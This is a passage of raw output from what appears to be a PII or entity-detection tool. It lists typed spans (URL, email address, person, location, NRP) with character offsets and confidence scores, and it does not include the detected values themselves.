8320, score: 0.5, type: URL, start: 8347, end: 8354, score: 0.5, type: URL, start: 8376, end: 8382, score: 0.5, type: URL, start: 8523, end: 8543, score: 0.5, type: URL, start: 8570, end: 8576, score: 0.5, type: URL, start: 8603, end: 8610, score: 0.5, type: URL, start: 8632, end: 8638, score: 0.5, type: URL, start: 8722, end: 8731, score: 0.5, type: URL, start: 8738, end: 8747, score: 0.5, type: URL, start: 8756, end: 8770, score: 0.5, type: URL, start: 8776, end: 8790, score: 0.5, type: URL, start: 8893, end: 8903, score: 0.5, type: URL, start: 8969, end: 8979, score: 0.5, type: URL, start: 9023, end: 9033, score: 0.5, type: URL, start: 9087, end: 9097, score: 0.5, type: URL, start: 9155, end: 9165, score: 0.5, type: URL, start: 9209, end: 9220, score: 0.5, type: URL, start: 9231, end: 9241, score: 0.5, type: URL, start: 9257, end: 9273, score: 0.5, type: URL, start: 9298, end: 9308, score: 0.5, type: URL, start: 9324, end: 9345, score: 0.5, type: URL, start: 9418, end: 9428, score: 0.5, type: URL, start: 9464, end: 9474, score: 0.5, type: URL, start: 9503, end: 9513, score: 0.5, type: URL, start: 9599, end: 9618, score: 0.5, type: URL, start: 9640, end: 9646, score: 0.5, type: URL, start: 9673, end: 9680, score: 0.5, type: URL, start: 9702, end: 9708, score: 0.5, type: URL, start: 9824, end: 9830, score: 0.5, type: URL, start: 9862, end: 9868, score: 0.5, type: URL, start: 9899, end: 9906, score: 0.5, type: URL, start: 9928, end: 9934, score: 0.5, type: URL, start: 9979, end: 9985, score: 0.5, type: URL, start: 10024, end: 10030, score: 0.5, type: URL, start: 10082, end: 10088, score: 0.5, type: URL, start: 10176, end: 10182, score: 0.5, type: URL, start: 10220, end: 10226, score: 0.5, type: URL, start: 10294, end: 10300, score: 0.5, type: URL, start: 10332, end: 10338, score: 0.5, type: URL, start: 10385, end: 10404, score: 0.5, type: URL, start: 10416, end: 10422, score: 0.5, type: URL, start: 10475, end: 10481, score: 0.5, type: URL, start: 10525, end: 10531, score: 0.5, type: URL, start: 10561, end: 10568, score: 0.5, type: URL, start: 10590, end: 10596, score: 0.5, type: URL, start: 10639, end: 10645, score: 0.5, type: URL, start: 10697, end: 10703, score: 0.5, type: URL, start: 10742, end: 10748, score: 0.5, type: URL, start: 10809, end: 10815, score: 0.5, type: URL, start: 10855, end: 10861, score: 0.5, type: URL, start: 10913, end: 10919, score: 0.5, type: URL, start: 10960, end: 10979, score: 0.5, type: URL, start: 11043, end: 11062, score: 0.5, type: URL, start: 11084, end: 11090, score: 0.5, type: URL, start: 11117, end: 11124, score: 0.5, type: URL, start: 11146, end: 11152, score: 0.5, type: URL, start: 11326, end: 11345, score: 0.5, type: URL, start: 11409, end: 11429, score: 0.5, type: URL, start: 11456, end: 11462, score: 0.5, type: URL, start: 11489, end: 11496, score: 0.5, type: URL, start: 11518, end: 11524, score: 0.5, type: URL, start: 11634, end: 11653, score: 0.5, type: URL, start: 11709, end: 11729, score: 0.5, type: URL, start: 11766, end: 11776, score: 0.5, type: URL, start: 11811, end: 11821, score: 0.5, type: URL, start: 11876, end: 11886, score: 0.5, type: URL, start: 11952, end: 11962, score: 0.5, type: URL, start: 12006, end: 12016, score: 0.5, type: URL, start: 12070, end: 12080, score: 0.5, type: URL, start: 12138, end: 12148, score: 0.5, type: URL, start: 12192, end: 12203, score: 0.5, type: URL, start: 12214, end: 12224, score: 0.5, type: URL, start: 12240, end: 12256, score: 0.5, type: URL, start: 12281, end: 12291, score: 0.5, type: URL, start: 12307, end: 12328, score: 0.5, type: URL, start: 12401, end: 12411, score: 0.5, type: URL, start: 12498, end: 12517, score: 0.5, type: URL, start: 12539, end: 12545, score: 0.5, type: URL, start: 12572, end: 12579, score: 0.5, type: URL, start: 12601, end: 12607, score: 0.5, type: URL, start: 12781, end: 12800, score: 0.5, type: URL, start: 12864, end: 12884, score: 0.5, type: URL, start: 12911, end: 12917, score: 0.5, type: URL, start: 12944, end: 12951, score: 0.5, type: URL, start: 12973, end: 12979, score: 0.5, type: URL, start: 13089, end: 13108, score: 0.5, type: URL, start: 13164, end: 13184, score: 0.5, type: URL, start: 13225, end: 13231, score: 0.5, type: URL, start: 13263, end: 13269, score: 0.5, type: URL, start: 13300, end: 13307, score: 0.5, type: URL, start: 13329, end: 13335, score: 0.5, type: URL, start: 13380, end: 13386, score: 0.5, type: URL, start: 13425, end: 13431, score: 0.5, type: URL, start: 13483, end: 13489, score: 0.5, type: URL, start: 13577, end: 13583, score: 0.5, type: URL, start: 13621, end: 13627, score: 0.5, type: URL, start: 13695, end: 13701, score: 0.5, type: URL, start: 13733, end: 13739, score: 0.5, type: URL, start: 13786, end: 13805, score: 0.5, type: URL, start: 13817, end: 13823, score: 0.5, type: URL, start: 13876, end: 13882, score: 0.5, type: URL, start: 13926, end: 13932, score: 0.5, type: URL, start: 13962, end: 13969, score: 0.5, type: URL, start: 13991, end: 13997, score: 0.5, type: URL, start: 14040, end: 14046, score: 0.5, type: URL, start: 14098, end: 14104, score: 0.5, type: URL, start: 14143, end: 14149, score: 0.5, type: URL, start: 14210, end: 14216, score: 0.5, type: URL, start: 14256, end: 14262, score: 0.5, type: URL, start: 14314, end: 14320, score: 0.5, type: URL, start: 14361, end: 14380, score: 0.5, type: URL, start: 14444, end: 14463, score: 0.5, type: URL, start: 14485, end: 14491, score: 0.5, type: URL, start: 14518, end: 14525, score: 0.5, type: URL, start: 14547, end: 14553, score: 0.5, type: URL, start: 14727, end: 14746, score: 0.5, type: URL, start: 14810, end: 14830, score: 0.5, type: URL, start: 14857, end: 14863, score: 0.5, type: URL, start: 14890, end: 14897, score: 0.5, type: URL, start: 14919, end: 14925, score: 0.5, type: URL, start: 15035, end: 15054, score: 0.5, type: URL, start: 15110, end: 15130, score: 0.5, type: URL, start: 15139, end: 15148, score: 0.5, type: URL, start: 15155, end: 15164, score: 0.5, type: URL, start: 15173, end: 15187, score: 0.5, type: URL, start: 15193, end: 15207, score: 0.5, type: URL, start: 15309, end: 15319, score: 0.5, type: URL, start: 15385, end: 15395, score: 0.5, type: URL, start: 15439, end: 15449, score: 0.5, type: URL, start: 15503, end: 15513, score: 0.5, type: URL, start: 15571, end: 15581, score: 0.5, type: URL, start: 15625, end: 15636, score: 0.5, type: URL, start: 15647, end: 15657, score: 0.5, type: URL, start: 15673, end: 15689, score: 0.5, type: URL, start: 15714, end: 15724, score: 0.5, type: URL, start: 15740, end: 15761, score: 0.5, type: URL, start: 15834, end: 15844, score: 0.5, type: URL, start: 15880, end: 15890, score: 0.5, type: URL, start: 15919, end: 15929, score: 0.5, type: URL, start: 16015, end: 16039, score: 0.5, type: URL, start: 16061, end: 16067, score: 0.5, type: URL, start: 16094, end: 16101, score: 0.5, type: URL, start: 16123, end: 16129, score: 0.5, type: URL, start: 16270, end: 16294, score: 0.5, type: URL, start: 16316, end: 16322, score: 0.5, type: URL, start: 16349, end: 16356, score: 0.5, type: URL, start: 16378, end: 16384, score: 0.5, type: URL, start: 16500, end: 16506, score: 0.5, type: URL, start: 16571, end: 16577, score: 0.5, type: URL, start: 16608, end: 16615, score: 0.5, type: URL, start: 16637, end: 16643, score: 0.5, type: URL, start: 16688, end: 16694, score: 0.5, type: URL, start: 16733, end: 16739, score: 0.5, type: URL, start: 16791, end: 16797, score: 0.5, type: URL, start: 16885, end: 16891, score: 0.5, type: URL, start: 16956, end: 16962, score: 0.5, type: URL, start: 17000, end: 17006, score: 0.5, type: URL, start: 17074, end: 17080, score: 0.5, type: URL, start: 17112, end: 17118, score: 0.5, type: URL, start: 17165, end: 17189, score: 0.5, type: URL, start: 17201, end: 17207, score: 0.5, type: URL, start: 17260, end: 17266, score: 0.5, type: URL, start: 17310, end: 17316, score: 0.5, type: URL, start: 17346, end: 17353, score: 0.5, type: URL, start: 17375, end: 17381, score: 0.5, type: URL, start: 17424, end: 17430, score: 0.5, type: URL, start: 17482, end: 17488, score: 0.5, type: URL, start: 17527, end: 17533, score: 0.5, type: URL, start: 17594, end: 17600, score: 0.5, type: URL, start: 17640, end: 17646, score: 0.5, type: URL, start: 17698, end: 17704, score: 0.5, type: URL, start: 17745, end: 17769, score: 0.5, type: URL, start: 17833, end: 17857, score: 0.5, type: URL, start: 17879, end: 17885, score: 0.5, type: URL, start: 17912, end: 17919, score: 0.5, type: URL, start: 17941, end: 17947, score: 0.5, type: URL, start: 18121, end: 18145, score: 0.5, type: URL, start: 18204, end: 18210, score: 0.5, type: URL, start: 18275, end: 18281, score: 0.5, type: URL, start: 18312, end: 18319, score: 0.5, type: URL, start: 18341, end: 18347, score: 0.5, type: URL, start: 18392, end: 18398, score: 0.5, type: URL, start: 18437, end: 18443, score: 0.5, type: URL, start: 18495, end: 18501, score: 0.5, type: URL, start: 18589, end: 18595, score: 0.5, type: URL, start: 18660, end: 18666, score: 0.5, type: URL, start: 18704, end: 18710, score: 0.5, type: URL, start: 18778, end: 18784, score: 0.5, type: URL, start: 18816, end: 18822, score: 0.5, type: URL, start: 18869, end: 18893, score: 0.5, type: URL, start: 18905, end: 18911, score: 0.5, type: URL, start: 18964, end: 18970, score: 0.5, type: URL, start: 19014, end: 19020, score: 0.5, type: URL, start: 19050, end: 19057, score: 0.5, type: URL, start: 19079, end: 19085, score: 0.5, type: URL, start: 19128, end: 19134, score: 0.5, type: URL, start: 19186, end: 19192, score: 0.5, type: URL, start: 19231, end: 19237, score: 0.5, type: URL, start: 19298, end: 19304, score: 0.5, type: URL, start: 19344, end: 19350, score: 0.5, type: URL, start: 19402, end: 19408, score: 0.5, type: URL, start: 19449, end: 19473, score: 0.5, type: URL, start: 19537, end: 19561, score: 0.5, type: URL, start: 19583, end: 19589, score: 0.5, type: URL, start: 19616, end: 19623, score: 0.5, type: URL, start: 19645, end: 19651, score: 0.5, type: URL, start: 19825, end: 19849, score: 0.5, type: URL, start: 19856, end: 19865, score: 0.5, type: URL, start: 19872, end: 19881, score: 0.5, type: URL, start: 19890, end: 19904, score: 0.5, type: URL, start: 19910, end: 19924, score: 0.5, type: URL, start: 20032, end: 20042, score: 0.5, type: URL, start: 20108, end: 20118, score: 0.5, type: URL, start: 20162, end: 20172, score: 0.5, type: URL, start: 20226, end: 20236, score: 0.5, type: URL, start: 20294, end: 20304, score: 0.5, type: URL, start: 20348, end: 20359, score: 0.5, type: URL, start: 20370, end: 20380, score: 0.5, type: URL, start: 20396, end: 20412, score: 0.5, type: URL, start: 20437, end: 20447, score: 0.5, type: URL, start: 20463, end: 20484, score: 0.5, type: URL, start: 20557, end: 20567, score: 0.5, type: URL, start: 20603, end: 20613, score: 0.5, type: URL, start: 20642, end: 20652, score: 0.5, type: URL, start: 20738, end: 20762, score: 0.5, type: URL, start: 20784, end: 20790, score: 0.5, type: URL, start: 20817, end: 20824, score: 0.5, type: URL, start: 20846, end: 20852, score: 0.5, type: URL, start: 20993, end: 21013, score: 0.5, type: URL, start: 21040, end: 21046, score: 0.5, type: URL, start: 21073, end: 21080, score: 0.5, type: URL, start: 21102, end: 21108, score: 0.5, type: URL, start: 21249, end: 21273, score: 0.5, type: URL, start: 21295, end: 21301, score: 0.5, type: URL, start: 21328, end: 21335, score: 0.5, type: URL, start: 21357, end: 21363, score: 0.5, type: URL, start: 21504, end: 21524, score: 0.5, type: URL, start: 21551, end: 21557, score: 0.5, type: URL, start: 21584, end: 21591, score: 0.5, type: URL, start: 21613, end: 21619, score: 0.5, type: URL, start: 21735, end: 21741, score: 0.5, type: URL, start: 21806, end: 21812, score: 0.5, type: URL, start: 21843, end: 21850, score: 0.5, type: URL, start: 21872, end: 21878, score: 0.5, type: URL, start: 21923, end: 21929, score: 0.5, type: URL, start: 21968, end: 21974, score: 0.5, type: URL, start: 22026, end: 22032, score: 0.5, type: URL, start: 22120, end: 22126, score: 0.5, type: URL, start: 22191, end: 22197, score: 0.5, type: URL, start: 22235, end: 22241, score: 0.5, type: URL, start: 22309, end: 22315, score: 0.5, type: URL, start: 22347, end: 22353, score: 0.5, type: URL, start: 22400, end: 22424, score: 0.5, type: URL, start: 22436, end: 22442, score: 0.5, type: URL, start: 22495, end: 22501, score: 0.5, type: URL, start: 22545, end: 22551, score: 0.5, type: URL, start: 22581, end: 22588, score: 0.5, type: URL, start: 22610, end: 22616, score: 0.5, type: URL, start: 22659, end: 22665, score: 0.5, type: URL, start: 22717, end: 22723, score: 0.5, type: URL, start: 22762, end: 22768, score: 0.5, type: URL, start: 22829, end: 22835, score: 0.5, type: URL, start: 22875, end: 22881, score: 0.5, type: URL, start: 22933, end: 22939, score: 0.5, type: URL, start: 22980, end: 23004, score: 0.5, type: URL, start: 23068, end: 23092, score: 0.5, type: URL, start: 23114, end: 23120, score: 0.5, type: URL, start: 23147, end: 23154, score: 0.5, type: URL, start: 23176, end: 23182, score: 0.5, type: URL, start: 23356, end: 23380, score: 0.5, type: URL, start: 23444, end: 23464, score: 0.5, type: URL, start: 23491, end: 23497, score: 0.5, type: URL, start: 23524, end: 23531, score: 0.5, type: URL, start: 23553, end: 23559, score: 0.5, type: URL, start: 23669, end: 23693, score: 0.5, type: URL, start: 23749, end: 23769, score: 0.5, type: URL, start: 23830, end: 23836, score: 0.5, type: URL, start: 23901, end: 23907, score: 0.5, type: URL, start: 23938, end: 23945, score: 0.5, type: URL, start: 23967, end: 23973, score: 0.5, type: URL, start: 24018, end: 24024, score: 0.5, type: URL, start: 24063, end: 24069, score: 0.5, type: URL, start: 24121, end: 24127, score: 0.5, type: URL, start: 24215, end: 24221, score: 0.5, type: URL, start: 24286, end: 24292, score: 0.5, type: URL, start: 24330, end: 24336, score: 0.5, type: URL, start: 24404, end: 24410, score: 0.5, type: URL, start: 24442, end: 24448, score: 0.5, type: URL, start: 24495, end: 24519, score: 0.5, type: URL, start: 24531, end: 24537, score: 0.5, type: URL, start: 24590, end: 24596, score: 0.5, type: URL, start: 24640, end: 24646, score: 0.5, type: URL, start: 24676, end: 24683, score: 0.5, type: URL, start: 24705, end: 24711, score: 0.5, type: URL, start: 24754, end: 24760, score: 0.5, type: URL, start: 24812, end: 24818, score: 0.5, type: URL, start: 24857, end: 24863, score: 0.5, type: URL, start: 24924, end: 24930, score: 0.5, type: URL, start: 24970, end: 24976, score: 0.5, type: URL, start: 25028, end: 25034, score: 0.5, type: URL, start: 25075, end: 25099, score: 0.5, type: URL, start: 25163, end: 25187, score: 0.5, type: URL, start: 25209, end: 25215, score: 0.5, type: URL, start: 25242, end: 25249, score: 0.5, type: URL, start: 25271, end: 25277, score: 0.5, type: URL, start: 25451, end: 25475, score: 0.5, type: URL, start: 25539, end: 25559, score: 0.5, type: URL, start: 25586, end: 25592, score: 0.5, type: URL, start: 25619, end: 25626, score: 0.5, type: URL, start: 25648, end: 25654, score: 0.5, type: URL, start: 25764, end: 25788, score: 0.5, type: URL, start: 25844, end: 25864, score: 0.5, type: URL, start: 25953, end: 25959, score: 0.5, type: URL, start: 26024, end: 26030, score: 0.5, type: URL, start: 26061, end: 26068, score: 0.5, type: URL, start: 26090, end: 26096, score: 0.5, type: URL, start: 26141, end: 26147, score: 0.5, type: URL, start: 26186, end: 26192, score: 0.5, type: URL, start: 26244, end: 26250, score: 0.5, type: URL, start: 26338, end: 26344, score: 0.5, type: URL, start: 26409, end: 26415, score: 0.5, type: URL, start: 26453, end: 26459, score: 0.5, type: URL, start: 26527, end: 26533, score: 0.5, type: URL, start: 26565, end: 26571, score: 0.5, type: URL, start: 26618, end: 26642, score: 0.5, type: URL, start: 26654, end: 26660, score: 0.5, type: URL, start: 26713, end: 26719, score: 0.5, type: URL, start: 26763, end: 26769, score: 0.5, type: URL, start: 26799, end: 26806, score: 0.5, type: URL, start: 26828, end: 26834, score: 0.5, type: URL, start: 26877, end: 26883, score: 0.5, type: URL, start: 26935, end: 26941, score: 0.5, type: URL, start: 26980, end: 26986, score: 0.5, type: URL, start: 27047, end: 27053, score: 0.5, type: URL, start: 27093, end: 27099, score: 0.5, type: URL, start: 27151, end: 27157, score: 0.5, type: URL, start: 27198, end: 27222, score: 0.5, type: URL, start: 27340, end: 27364, score: 0.5, type: URL, start: 27386, end: 27392, score: 0.5, type: URL, start: 27419, end: 27426, score: 0.5, type: URL, start: 27448, end: 27454, score: 0.5, type: URL, start: 27628, end: 27652, score: 0.5, type: URL, start: 27716, end: 27736, score: 0.5, type: URL, start: 27763, end: 27769, score: 0.5, type: URL, start: 27796, end: 27803, score: 0.5, type: URL, start: 27825, end: 27831, score: 0.5, type: URL, start: 27941, end: 27965, score: 0.5, type: URL, start: 28021, end: 28041, score: 0.5, type: URL, start: 28107, end: 28131, score: 0.5, type: URL, start: 28153, end: 28159, score: 0.5, type: URL, start: 28186, end: 28193, score: 0.5, type: URL, start: 28215, end: 28221, score: 0.5, type: URL, start: 28362, end: 28382, score: 0.5, type: URL, start: 28409, end: 28415, score: 0.5, type: URL, start: 28442, end: 28449, score: 0.5, type: URL, start: 28471, end: 28477, score: 0.5, type: URL, start: 28561, end: 28570, score: 0.5, type: URL, start: 28577, end: 28586, score: 0.5, type: URL, start: 28595, end: 28609, score: 0.5, type: URL, start: 28615, end: 28629, score: 0.5, type: URL, start: 28756, end: 28766, score: 0.5, type: URL, start: 28832, end: 28842, score: 0.5, type: URL, start: 28886, end: 28896, score: 0.5, type: URL, start: 28958, end: 28968, score: 0.5, type: URL, start: 29022, end: 29032, score: 0.5, type: URL, start: 29090, end: 29100, score: 0.5, type: URL, start: 29144, end: 29155, score: 0.5, type: URL, start: 29166, end: 29176, score: 0.5, type: URL, start: 29192, end: 29208, score: 0.5, type: URL, start: 29233, end: 29243, score: 0.5, type: URL, start: 29259, end: 29280, score: 0.5, type: URL, start: 29353, end: 29363, score: 0.5, type: URL, start: 29399, end: 29409, score: 0.5, type: URL, start: 29438, end: 29448, score: 0.5, type: URL, start: 29534, end: 29553, score: 0.5, type: URL, start: 29575, end: 29581, score: 0.5, type: URL, start: 29608, end: 29615, score: 0.5, type: URL, start: 29637, end: 29643, score: 0.5, type: URL, start: 29759, end: 29765, score: 0.5, type: URL, start: 29797, end: 29803, score: 0.5, type: URL, start: 29834, end: 29841, score: 0.5, type: URL, start: 29863, end: 29869, score: 0.5, type: URL, start: 29914, end: 29920, score: 0.5, type: URL, start: 29959, end: 29965, score: 0.5, type: URL, start: 30017, end: 30023, score: 0.5, type: URL, start: 30111, end: 30117, score: 0.5, type: URL, start: 30155, end: 30161, score: 0.5, type: URL, start: 30229, end: 30235, score: 0.5, type: URL, start: 30267, end: 30273, score: 0.5, type: URL, start: 30320, end: 30339, score: 0.5, type: URL, start: 30351, end: 30357, score: 0.5, type: URL, start: 30401, end: 30407, score: 0.5, type: URL, start: 30437, end: 30444, score: 0.5, type: URL, start: 30466, end: 30472, score: 0.5, type: URL, start: 30515, end: 30521, score: 0.5, type: URL, start: 30573, end: 30579, score: 0.5, type: URL, start: 30618, end: 30624, score: 0.5, type: URL, start: 30685, end: 30691, score: 0.5, type: URL, start: 30731, end: 30737, score: 0.5, type: URL, start: 30789, end: 30795, score: 0.5, type: URL, start: 30836, end: 30855, score: 0.5, type: URL, start: 30919, end: 30938, score: 0.5, type: URL, start: 30960, end: 30966, score: 0.5, type: URL, start: 30993, end: 31000, score: 0.5, type: URL, start: 31022, end: 31028, score: 0.5, type: URL, start: 31202, end: 31221, score: 0.5, type: URL, start: 31285, end: 31305, score: 0.5, type: URL, start: 31332, end: 31338, score: 0.5, type: URL, start: 31365, end: 31372, score: 0.5, type: URL, start: 31394, end: 31400, score: 0.5, type: URL, start: 31510, end: 31529, score: 0.5, type: URL, start: 31585, end: 31605, score: 0.5, type: URL, start: 31614, end: 31623, score: 0.5, type: URL, start: 31630, end: 31639, score: 0.5, type: URL, start: 31648, end: 31662, score: 0.5, type: URL, start: 31668, end: 31682, score: 0.5, type: URL, start: 31772, end: 31782, score: 0.5, type: URL, start: 31848, end: 31858, score: 0.5, type: URL, start: 31902, end: 31912, score: 0.5, type: URL, start: 31966, end: 31976, score: 0.5, type: URL, start: 32034, end: 32044, score: 0.5, type: URL, start: 32088, end: 32099, score: 0.5, type: URL, start: 32110, end: 32120, score: 0.5, type: URL, start: 32136, end: 32152, score: 0.5, type: URL, start: 32177, end: 32187, score: 0.5, type: URL, start: 32203, end: 32224, score: 0.5, type: URL, start: 32297, end: 32307, score: 0.5, type: URL, start: 32343, end: 32353, score: 0.5, type: URL, start: 32382, end: 32392, score: 0.5, type: URL, start: 32478, end: 32497, score: 0.5, type: URL, start: 32519, end: 32525, score: 0.5, type: URL, start: 32552, end: 32559, score: 0.5, type: URL, start: 32581, end: 32587, score: 0.5, type: URL, start: 32728, end: 32748, score: 0.5, type: URL, start: 32775, end: 32781, score: 0.5, type: URL, start: 32808, end: 32815, score: 0.5, type: URL, start: 32837, end: 32843, score: 0.5, type: URL, start: 32959, end: 32965, score: 0.5, type: URL, start: 32997, end: 33003, score: 0.5, type: URL, start: 33034, end: 33041, score: 0.5, type: URL, start: 33063, end: 33069, score: 0.5, type: URL, start: 33114, end: 33120, score: 0.5, type: URL, start: 33159, end: 33165, score: 0.5, type: URL, start: 33217, end: 33223, score: 0.5, type: URL, start: 33311, end: 33317, score: 0.5, type: URL, start: 33355, end: 33361, score: 0.5, type: URL, start: 33429, end: 33435, score: 0.5, type: URL, start: 33467, end: 33473, score: 0.5, type: URL, start: 33520, end: 33539, score: 0.5, type: URL, start: 33551, end: 33557, score: 0.5, type: URL, start: 33601, end: 33607, score: 0.5, type: URL, start: 33637, end: 33644, score: 0.5, type: URL, start: 33666, end: 33672, score: 0.5, type: URL, start: 33715, end: 33721, score: 0.5, type: URL, start: 33773, end: 33779, score: 0.5, type: URL, start: 33818, end: 33824, score: 0.5, type: URL, start: 33885, end: 33891, score: 0.5, type: URL, start: 33931, end: 33937, score: 0.5, type: URL, start: 33989, end: 33995, score: 0.5, type: URL, start: 34036, end: 34055, score: 0.5, type: URL, start: 34119, end: 34139, score: 0.5, type: URL, start: 34166, end: 34172, score: 0.5, type: URL, start: 34199, end: 34206, score: 0.5, type: URL, start: 34228, end: 34234, score: 0.5, type: URL, start: 34344, end: 34363, score: 0.5, type: URL, start: 34419, end: 34439, score: 0.5, type: URL, start: 34505, end: 34524, score: 0.5, type: URL, start: 34546, end: 34552, score: 0.5, type: URL, start: 34579, end: 34586, score: 0.5, type: URL, start: 34608, end: 34614, score: 0.5, type: URL, start: 34698, end: 34707, score: 0.5, type: URL, start: 34714, end: 34723, score: 0.5, type: URL, start: 34732, end: 34746, score: 0.5, type: URL, start: 34752, end: 34766, score: 0.5, type: URL, start: 34859, end: 34869, score: 0.5, type: URL, start: 34935, end: 34945, score: 0.5, type: URL, start: 34989, end: 34999, score: 0.5, type: URL, start: 35054, end: 35064, score: 0.5, type: URL, start: 35122, end: 35132, score: 0.5, type: URL, start: 35176, end: 35187, score: 0.5, type: URL, start: 35198, end: 35208, score: 0.5, type: URL, start: 35224, end: 35240, score: 0.5, type: URL, start: 35265, end: 35275, score: 0.5, type: URL, start: 35291, end: 35312, score: 0.5, type: URL, start: 35385, end: 35395, score: 0.5, type: URL, start: 35431, end: 35441, score: 0.5, type: URL, start: 35470, end: 35480, score: 0.5, type: URL, start: 35566, end: 35585, score: 0.5, type: URL, start: 35607, end: 35613, score: 0.5, type: URL, start: 35640, end: 35647, score: 0.5, type: URL, start: 35669, end: 35675, score: 0.5, type: URL, start: 35816, end: 35836, score: 0.5, type: URL, start: 35863, end: 35869, score: 0.5, type: URL, start: 35896, end: 35903, score: 0.5, type: URL, start: 35925, end: 35931, score: 0.5, type: URL, start: 36047, end: 36053, score: 0.5, type: URL, start: 36085, end: 36091, score: 0.5, type: URL, start: 36122, end: 36129, score: 0.5, type: URL, start: 36151, end: 36157, score: 0.5, type: URL, start: 36202, end: 36208, score: 0.5, type: URL, start: 36247, end: 36253, score: 0.5, type: URL, start: 36305, end: 36311, score: 0.5, type: URL, start: 36399, end: 36405, score: 0.5, type: URL, start: 36443, end: 36449, score: 0.5, type: URL, start: 36517, end: 36523, score: 0.5, type: URL, start: 36555, end: 36561, score: 0.5, type: URL, start: 36608, end: 36627, score: 0.5, type: URL, start: 36639, end: 36645, score: 0.5, type: URL, start: 36689, end: 36695, score: 0.5, type: URL, start: 36725, end: 36732, score: 0.5, type: URL, start: 36754, end: 36760, score: 0.5, type: URL, start: 36803, end: 36809, score: 0.5, type: URL, start: 36861, end: 36867, score: 0.5, type: URL, start: 36906, end: 36912, score: 0.5, type: URL, start: 36973, end: 36979, score: 0.5, type: URL, start: 37110, end: 37116, score: 0.5, type: URL, start: 37157, end: 37176, score: 0.5, type: URL, start: 37240, end: 37260, score: 0.5, type: URL, start: 37287, end: 37293, score: 0.5, type: URL, start: 37320, end: 37327, score: 0.5, type: URL, start: 37349, end: 37355, score: 0.5, type: URL, start: 37496, end: 37515, score: 0.5, type: URL, start: 37537, end: 37543, score: 0.5, type: URL, start: 37570, end: 37577, score: 0.5, type: URL, start: 37599, end: 37605, score: 0.5, type: URL, start: 37689, end: 37698, score: 0.5, type: URL, start: 37705, end: 37714, score: 0.5, type: URL, start: 37723, end: 37737, score: 0.5, type: URL, start: 37743, end: 37757, score: 0.5, type: URL, start: 37852, end: 37862, score: 0.5, type: URL, start: 37928, end: 37938, score: 0.5, type: URL, start: 37982, end: 37992, score: 0.5, type: URL, start: 38050, end: 38060, score: 0.5, type: URL, start: 38114, end: 38124, score: 0.5, type: URL, start: 38182, end: 38192, score: 0.5, type: URL, start: 38236, end: 38247, score: 0.5, type: URL, start: 38258, end: 38268, score: 0.5, type: URL, start: 38284, end: 38300, score: 0.5, type: URL, start: 38325, end: 38335, score: 0.5, type: URL, start: 38351, end: 38372, score: 0.5, type: URL, start: 38445, end: 38455, score: 0.5, type: URL, start: 38491, end: 38501, score: 0.5, type: URL, start: 38530, end: 38540, score: 0.5, type: URL, start: 38626, end: 38645, score: 0.5, type: URL, start: 38667, end: 38673, score: 0.5, type: URL, start: 38700, end: 38707, score: 0.5, type: URL, start: 38729, end: 38735, score: 0.5, type: URL, start: 38851, end: 38857, score: 0.5, type: URL, start: 38889, end: 38895, score: 0.5, type: URL, start: 38926, end: 38933, score: 0.5, type: URL, start: 38955, end: 38961, score: 0.5, type: URL, start: 39006, end: 39012, score: 0.5, type: URL, start: 39051, end: 39057, score: 0.5, type: URL, start: 39109, end: 39115, score: 0.5, type: URL, start: 39203, end: 39209, score: 0.5, type: URL, start: 39247, end: 39253, score: 0.5, type: URL, start: 39321, end: 39327, score: 0.5, type: URL, start: 39359, end: 39365, score: 0.5, type: URL, start: 39418, end: 39424, score: 0.5, type: URL, start: 39471, end: 39490, score: 0.5, type: URL, start: 39502, end: 39508, score: 0.5, type: URL, start: 39552, end: 39558, score: 0.5, type: URL, start: 39588, end: 39595, score: 0.5, type: URL, start: 39617, end: 39623, score: 0.5, type: URL, start: 39666, end: 39672, score: 0.5, type: URL, start: 39724, end: 39730, score: 0.5, type: URL, start: 39769, end: 39775, score: 0.5, type: URL, start: 39836, end: 39842, score: 0.5, type: URL, start: 39882, end: 39888, score: 0.5, type: URL, start: 39940, end: 39946, score: 0.5, type: URL, start: 39987, end: 40006, score: 0.5, type: URL, start: 40070, end: 40090, score: 0.5, type: URL, start: 40117, end: 40123, score: 0.5, type: URL, start: 40150, end: 40157, score: 0.5, type: URL, start: 40179, end: 40185, score: 0.5, type: URL, start: 40295, end: 40314, score: 0.5, type: URL, start: 40370, end: 40390, score: 0.5, type: URL, start: 40456, end: 40475, score: 0.5, type: URL, start: 40498, end: 40504, score: 0.5, type: URL, start: 40531, end: 40538, score: 0.5, type: URL, start: 40560, end: 40566, score: 0.5, type: URL, start: 40740, end: 40759, score: 0.5, type: EMAIL_ADDRESS, start: 111, end: 126, score: 1.0, type: EMAIL_ADDRESS, start: 1168, end: 1183, score: 1.0, type: EMAIL_ADDRESS, start: 2240, end: 2255, score: 1.0, type: PERSON, start: 96, end: 110, score: 0.85, type: LOCATION, start: 169, end: 183, score: 0.85, type: NRP, start: 326, end: 348, score: 0.85, type: PERSON, start: 734, end: 746, score: 0.85, type: LOCATION, start: 1042, end: 1054, score: 0.85, type: PERSON, start: 1153, end: 1167, score: 0.85, type: LOCATION, start: 1226, end: 1240, score: 0.85, type: NRP, start: 1383, end: 1405, score: 0.85, type: PERSON, start: 1791, end: 1803, score: 0.85, type: LOCATION, start: 2099, end: 2111, score: 0.85, type: PERSON, start: 2225, end: 2239, score: 0.85, type: LOCATION, start: 2298, end: 2312, score: 0.85, type: NRP, start: 2455, end: 2477, score: 0.85, type: PERSON, start: 2863, end: 2875, score: 0.85, type: LOCATION, start: 3171, end: 3183, score: 0.85, type: URL, start: 38, end: 43, score: 0.5, type: URL, start: 117, end: 126, score: 0.5, type: URL, start: 208, end: 218, score: 0.5, type: URL, start: 252, end: 261, score: 0.5, type: URL, start: 306, end: 314, score: 0.5, type: URL, start: 345, end: 351, score: 0.5, type: URL, start: 403, end: 412, score: 0.5, type: URL, start: 475, end: 481, score: 0.5, type: URL, start: 533, end: 542, score: 0.5, type: URL, start: 606, end: 612, score: 0.5, type: URL, start: 633, end: 642, score: 0.5, type: URL, start: 700, end: 706, score: 0.5, type: URL, start: 727, end: 736, score: 0.5, type: URL, start: 798, end: 807, score: 0.5, type: URL, start: 1095, end: 1100, score: 0.5, type: URL, start: 1174, end: 1183, score: 0.5, type: URL, start: 1265, end: 1275, score: 0.5, type: URL, start: 1309, end: 1318, score: 0.5, type: URL, start: 1363, end: 1371, score: 0.5, type: URL, start: 1402, end: 1408, score: 0.5, type: URL, start: 1460, end: 1469, score: 0.5, type: URL, start: 1532, end: 1538, score: 0.5, type: URL, start: 1590, end: 1599, score: 0.5, type: URL, start: 1663, end: 1669, score: 0.5, type: URL, start: 1690, 